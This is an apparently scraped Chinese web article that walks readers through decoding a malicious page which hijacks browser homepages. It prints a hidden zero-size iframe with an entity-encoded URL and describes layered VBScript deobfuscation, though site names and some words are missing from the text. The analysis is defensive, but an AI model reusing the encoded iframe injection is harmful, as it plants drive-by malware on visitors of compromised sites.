唐山信息网
游戏
当前位置:首页 > 游戏

简单易行轻松挖出恶意网站中藏的病毒

发布时间:2019-11-10 21:46:23 编辑:笔名

简单易行 轻松挖出恶意站中藏的病毒

A5任务 SEO诊断选学淘宝客 站长团购 云主机

前不久,很多友都感染了的病毒,首页被改成这个站,并且无法改回。黑客是如何做到锁定用户的浏览器首页呢?下面我们就去探个究竟。

提醒:分析病毒存在一定风险,建议在虚拟机下操作。

第一步 查看首页的源代码,可以发现在尾部有如下的字样:

iframe src= #104 #116 #116 #112 #58 #47 #47 #109 #46 #100 #97 #115 #104 #111 #119 #46 #99 #111 #109 #46 #99 #110 #47 #109 #46 #104 #116 #109 #108 width=0 height=0 /iframe

这是一个嵌入到7b址之家首页的页面,即打开也就同时打开了这个页面。

而 #104 #116 #116 #112 #58 #47 #47 #109 #46 #100 #97 #115 #104 #111 #119 #46 #99 #111 #109 #46 #99 #110 #47 #109 #46 #104 #116 #109 #108 表示的是一个字符串, # 后面是每个字符串ASCII的十进制值。

直接把这段乱码保存为HTM文件,用IE打开,就可以看到它的真实面目 。

第二步 查看的源代码,把看的 scrtipt 脚本段中的Execute替换为ite,然后打开这个HTM页面,就会出现一段代码,同样地,把EXECUTE换成我们无敌的ite,前后加脚本标记,存HTM打开。屏幕上立即出现了一段令人眼花的东西。把眼花缭乱的东西整理一下,并将出现的CHR()在前面用到过,作用是把字符的ASCII转成字符,只不过这次是16进制。然后再将字符拼接成字符串,然后再Execute运行这个命令字符串。继续用ite替换掉EXECUTE,前后加脚本标记,存HTM打开。

第三步 经过上几步的还原后终于看到了这个恶意页面的最终面目。

on error resume next curl = 其后省略。

这段代码中我们可以很清楚地看到这个链接。没错,它就是运行后可以将用户主页锁定为的病毒。

可以用下载工具将这个文件下载下来,如果你的杀毒软件查不到的话最好立即上报。这样可以保证杀毒软件快速查杀这个病毒,并使更少的友免受该病毒的侵害。

租房资讯
纺织机械设备
单机资讯